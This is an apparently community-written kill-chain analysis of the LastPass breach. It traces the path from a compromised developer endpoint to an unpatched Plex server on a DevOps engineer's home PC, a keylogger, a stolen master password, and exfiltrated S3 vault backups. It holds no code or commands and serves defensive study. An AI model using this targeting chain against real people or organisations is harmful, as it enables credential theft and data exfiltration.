A two-stage attack first compromised LastPass's development environment, then used the stolen technical knowledge to target a specific DevOps engineer β one of only four people with access to production decryption keys. The attacker exploited a years-old unpatched vulnerability in Plex Media Server on the engineer's personal home computer to install a keylogger, captured the master password, unlocked the engineer's personal LastPass vault, and used the cloud credentials inside to exfiltrate encrypted customer vault backups from AWS S3. The entire chain required no zero-days in LastPass's production infrastructure.
A LastPass software developer's endpoint was compromised via a third-party software package. The attacker used this foothold to access the developer's credentials and the shared development environment, exfiltrating source code, technical documentation, internal secrets, and some customer metadata. LastPass disclosed this breach in August 2022, describing it as a development environment incident with no customer data or vault content accessed. What wasn't known at the time: the stolen technical documentation would be used to plan Stage 2.
Customer impact at Stage 1: None disclosed β no production access, no vault data
Strategic value to attacker: Infrastructure topology, S3 bucket names, backup key architecture, target identity (DevOps engineer)
Using the documentation stolen in Stage 1, the attacker understood exactly how LastPass's production backup encryption worked: a small set of DevOps engineers held decryption keys for the production S3 backup environment. Only four employees had access. The attacker identified one of these four as the target for Stage 2 β choosing home infrastructure as the attack surface because personal endpoints are outside corporate MDM and EDR coverage.
Attack surface chosen: Personal home computer β outside corporate MDM, EDR, and monitoring
Intelligence source: Stage 1 stolen technical documentation and internal runbooks
The targeted DevOps engineer ran Plex Media Server on their personal home computer. The attacker exploited a known vulnerability in Plex that had been publicly disclosed years prior and had a patch available β but the engineer's home installation was unpatched. Plex itself disclosed separately that it had been notified of this exploitation and confirmed the CVE was over two years old with a patch available. The exploit provided remote code execution on the home machine.
Vulnerability age: Over 2 years old with patch available at time of exploitation
Attack surface: Personal home computer β no corporate EDR, no MDM, no monitoring
Result: Remote code execution on the DevOps engineer's home machine
Using the RCE foothold, the attacker installed a keylogger on the DevOps engineer's home PC. When the engineer next unlocked their personal LastPass vault, the master password was captured in plaintext. LastPass confirmed the keylogger captured the master password while the MFA was bypassed β the engineer's vault was on a personal device where MFA state was already trusted, meaning only the master password was needed to decrypt the local vault.
MFA bypass: Personal device was a trusted device β MFA not re-prompted at each vault unlock
What was captured: Master password for the DevOps engineer's personal LastPass vault
The attacker used the captured master password to decrypt the DevOps engineer's LastPass vault. Inside were the credentials the engineer used day-to-day: AWS IAM access keys, cloud infrastructure credentials, and the decryption keys for the LastPass production backup environment stored in S3. The vault effectively contained the keys to the kingdom β by targeting the one person whose vault was both accessible from a personal device and contained production credentials, the attacker bypassed all of LastPass's production security controls in a single step.
Irony: A password manager's own vault was the attack vector against its production infrastructure
Architectural failure: Production credentials stored in a personal vault on an unmanaged device
Using the AWS credentials from the decrypted vault, the attacker accessed LastPass's production S3 backup buckets and exfiltrated a copy of all encrypted customer vault backups. The backup files also contained unencrypted metadata: website URLs, usernames, billing information, IP addresses, and MFA seeds for some accounts. The encrypted vault data itself is protected by each customer's master password β but weak master passwords remain vulnerable to offline brute-force attacks against the exfiltrated data.
Unencrypted metadata also taken: Website URLs, usernames, billing data, IP history, MFA seeds
Ongoing risk: Offline brute-force attacks against encrypted vaults using weak master passwords
Also taken: API integration secrets, multi-factor authentication seeds, customer keys
π‘ How to Defend Against This Chain
// Know a breach with a detailed post-mortem?
This is a community resource. Submit a PR to add a new kill chain β include MITRE technique IDs and link to primary sources.
β Contribute on GitHub